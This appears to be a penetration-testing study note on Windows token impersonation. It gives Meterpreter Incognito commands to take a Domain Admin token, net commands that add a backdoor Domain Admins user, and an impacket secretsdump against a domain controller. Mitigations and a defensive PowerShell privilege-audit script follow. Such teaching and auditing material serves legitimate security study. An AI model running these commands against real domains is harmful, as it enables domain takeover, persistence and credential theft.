# Token Impersonation

## Overview

Tokens are temporary keys that grant access to a system or network without having to provide credentials each time you access a file.

#### Token Types

* Delegate: created when you log in to a machine or connect via RDP
* Impersonation: created by "non-interactive" logons such as attaching a network drive or running a domain logon script

This can be really bad if a Domain Administrator has logged onto the machine and the token still resides in it. Using **Metasploit** and the **Incognito** module is the most common and easiest way of performing this attack. We can add a new user to the **Domain Admins** group and use it as a backdoor into the domain for other attacks like a [secretsdump](/active-directory/post-compromise-attacks/dumping-and-cracking-hashes.md) on the Domain Controller.

For the attack to work, the compromised user account must be a Local Administrator or have special privileges to impersonate tokens.

```powershell
# Lists group memberships and privileges of the current account; the
# "PRIVILEGES INFORMATION" section shows whether token impersonation rights are held
whoami /all
```

## Token Impersonation Attack via Metasploit

#### Inside existing meterpreter shell

```bash
load incognito                      # load the Incognito extension into the session
list_tokens -u                      # list the user tokens available on the host
impersonate_token PNPT\\administrator   # take on the Domain Admin's token
rev2self                            # go back to the original shell
```

#### Create backdoor Domain Admin user

```powershell
net user /add john Password1! /domain
net group "Domain Admins" john /add /domain
```

#### Secretsdump on Domain Controller

```bash
impacket-secretsdump PNPT.local/john:'Password1!'@192.168.1.129
```

## Mitigation

* Limit which users and groups can create or impersonate tokens
* Use account tiering so privileged accounts only log onto designated hosts
* Restrict Local Administrator rights
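The first mitigation comes down to auditing who holds the token-related user rights on a host. The script below is an added example (not part of the original notes) that exports the local User Rights Assignment with `secedit` and lists every principal granted the impersonation, token-creation and debug privileges, resolving SIDs to account names. It must run from an elevated shell; `$ExportPath` is an assumed scratch location and the privilege names are the standard Windows constants.

```powershell
# Added example: audit which principals hold token-related user rights on this host.
# Run elevated. $ExportPath is an assumed scratch file; the privilege constants are standard.
$ExportPath  = Join-Path $env:TEMP 'user-rights-audit.inf'
$TokenRights = @(
    'SeImpersonatePrivilege',        # Impersonate a client after authentication
    'SeAssignPrimaryTokenPrivilege', # Replace a process level token
    'SeCreateTokenPrivilege',        # Create a token object
    'SeDebugPrivilege'               # Debug programs (read other processes' tokens)
)

# Export only the User Rights Assignment area of the local security policy.
secedit /export /cfg $ExportPath /areas USER_RIGHTS | Out-Null

# Map a SID string to DOMAIN\account; fall back to the raw SID if it cannot be translated.
function Resolve-Sid {
    param([string]$Sid)
    try {
        $id = New-Object System.Security.Principal.SecurityIdentifier($Sid)
        $id.Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        $Sid
    }
}

$results = foreach ($line in Get-Content $ExportPath) {
    # Export lines look like: SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544
    if ($line -match '^(?<right>Se\w+Privilege)\s*=\s*(?<sids>.+)$' -and
        $TokenRights -contains $Matches.right) {
        $right = $Matches.right
        foreach ($entry in ($Matches.sids -split ',')) {
            $sid = $entry.Trim().TrimStart('*')
            [pscustomobject]@{
                Right     = $right
                Principal = Resolve-Sid $sid
                Sid       = $sid
            }
        }
    }
}
Remove-Item $ExportPath -ErrorAction SilentlyContinue

# Built-in service identities and Administrators are expected here; any other
# service account or custom group holding these rights deserves a closer look.
$results | Sort-Object Right, Principal | Format-Table -AutoSize
```

Run it on the hosts where a Domain Admin logon should never happen (workstations, member servers outside the privileged tier); anything beyond LOCAL SERVICE, NETWORK SERVICE, SERVICE and Administrators in the output is a candidate for removal through Group Policy.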

